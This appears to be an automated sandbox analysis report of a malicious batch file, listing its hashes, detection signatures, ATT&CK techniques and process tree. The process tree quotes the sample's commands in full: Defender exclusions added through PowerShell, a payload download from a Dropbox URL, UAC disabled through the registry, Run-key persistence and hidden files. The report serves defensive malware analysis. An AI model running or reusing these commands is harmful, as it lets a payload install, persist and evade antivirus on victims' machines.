Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-11-2024 18:36
Static task
static1
Behavioral task
behavioral1
Sample
noloud.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
noloud.bat
Resource
win10v2004-20241007-en
General
-
Target
noloud.bat
-
Size
12KB
-
MD5
e435591eabd5596e754a7acaede7dca7
-
SHA1
2b1b728aae5d3e72fe4bc864559d0347489f995a
-
SHA256
a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d
-
SHA512
3248a7cf8542068c126906b9db5e3fb0dde7ca123b7cf3f5375aad6b5c65bb909db5e3b5e127104e664b57eea4774d5283228533f01beb45b50ccdd3545e8f69
-
SSDEEP
384:gTYcpQyuPmhDGEhtKCR2XYmE2JdAp6EbW263JM3jXMIccK:gTYcpQyuPmhDGEhtKCReU2JdjES3JQj4
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2784 powershell.exe 2588 powershell.exe 2852 powershell.exe 472 powershell.exe 2720 powershell.exe 2612 powershell.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe" reg.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 1472 reg.exe 1944 reg.exe 316 reg.exe 1656 reg.exe 1176 reg.exe 2520 reg.exe 1088 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2852 powershell.exe 472 powershell.exe 2784 powershell.exe 2588 powershell.exe 2720 powershell.exe 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 472 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2916 wrote to memory of 2412 2916 cmd.exe 31 PID 2916 wrote to memory of 2412 2916 cmd.exe 31 PID 2916 wrote to memory of 2412 2916 cmd.exe 31 PID 2412 wrote to memory of 2136 2412 net.exe 32 PID 2412 wrote to memory of 2136 2412 net.exe 32 PID 2412 wrote to memory of 2136 2412 net.exe 32 PID 2916 wrote to memory of 2852 2916 cmd.exe 33 PID 2916 wrote to memory of 2852 2916 cmd.exe 33 PID 2916 wrote to memory of 2852 2916 cmd.exe 33 PID 2916 wrote to memory of 472 2916 cmd.exe 34 PID 2916 wrote to memory of 472 2916 cmd.exe 34 PID 2916 wrote to memory of 472 2916 cmd.exe 34 PID 2916 wrote to memory of 2784 2916 cmd.exe 35 PID 2916 wrote to memory of 2784 2916 cmd.exe 35 PID 2916 wrote to memory of 2784 2916 cmd.exe 35 PID 2916 wrote to memory of 2588 2916 cmd.exe 36 PID 2916 wrote to memory of 2588 2916 cmd.exe 36 PID 2916 wrote to memory of 2588 2916 cmd.exe 36 PID 2916 wrote to memory of 636 2916 cmd.exe 37 PID 2916 wrote to memory of 636 2916 cmd.exe 37 PID 2916 wrote to memory of 636 2916 cmd.exe 37 PID 2916 wrote to memory of 2720 2916 cmd.exe 38 PID 2916 wrote to memory of 2720 2916 cmd.exe 38 PID 2916 wrote to memory of 2720 2916 cmd.exe 38 PID 2916 wrote to memory of 2612 2916 cmd.exe 39 PID 2916 wrote to memory of 2612 2916 cmd.exe 39 PID 2916 wrote to memory of 2612 2916 cmd.exe 39 PID 2916 wrote to memory of 2520 2916 cmd.exe 40 PID 2916 wrote to memory of 2520 2916 cmd.exe 40 PID 2916 wrote to memory of 2520 2916 cmd.exe 40 PID 2916 wrote to memory of 1636 2916 cmd.exe 41 PID 2916 wrote to memory of 1636 2916 cmd.exe 41 PID 2916 wrote to memory of 1636 2916 cmd.exe 41 PID 2916 wrote to memory of 828 2916 cmd.exe 42 PID 2916 wrote to memory of 828 2916 cmd.exe 42 PID 2916 wrote to memory of 828 2916 cmd.exe 42 PID 2916 wrote to memory of 1088 2916 cmd.exe 43 PID 2916 wrote to memory of 1088 2916 cmd.exe 43 PID 2916 wrote to memory of 1088 2916 cmd.exe 43 PID 2916 wrote to memory of 1472 2916 cmd.exe 44 PID 2916 wrote to memory of 1472 2916 cmd.exe 44 PID 2916 wrote to memory of 1472 2916 cmd.exe 44 PID 2916 wrote to memory of 1944 2916 cmd.exe 45 PID 2916 wrote to memory of 1944 2916 cmd.exe 45 PID 2916 wrote to memory of 1944 2916 cmd.exe 45 PID 2916 wrote to memory of 316 2916 cmd.exe 46 PID 2916 wrote to memory of 316 2916 cmd.exe 46 PID 2916 wrote to memory of 316 2916 cmd.exe 46 PID 2916 wrote to memory of 1656 2916 cmd.exe 47 PID 2916 wrote to memory of 1656 2916 cmd.exe 47 PID 2916 wrote to memory of 1656 2916 cmd.exe 47 PID 2916 wrote to memory of 1176 2916 cmd.exe 48 PID 2916 wrote to memory of 1176 2916 cmd.exe 48 PID 2916 wrote to memory of 1176 2916 cmd.exe 48 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1636 attrib.exe 828 attrib.exe 636 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\noloud.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2136
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\system32\attrib.exeattrib +h "PP2" /s/d2⤵
- Views/modifies file attributes
PID:636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebrequestWindows_NT 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\system32\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:2520
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d2⤵
- Views/modifies file attributes
PID:1636
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d2⤵
- Views/modifies file attributes
PID:828
-
-
C:\Windows\system32\reg.exereg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:1088
-
-
C:\Windows\system32\reg.exereg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:1472
-
-
C:\Windows\system32\reg.exereg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:1944
-
-
C:\Windows\system32\reg.exereg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:316
-
-
C:\Windows\system32\reg.exereg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:1656
-
-
C:\Windows\system32\reg.exereg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:1176
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD583369889cf04a914fa87cb95e619d4e0
SHA17663edb02c4b39f9062c56b80a28ba7915b29d86
SHA2562d2c7edce098b6b511322871a34e1ec7813ad06191473a9d4b3b98ab18624b75
SHA5125cae49df35f702c2693db0a32a7fbe5d9382f22f97214672cb709cf866aad453f3e25d3347fb86ba7b12438366f4a37d71ec8ce95405c8d68084f37e22c5ec56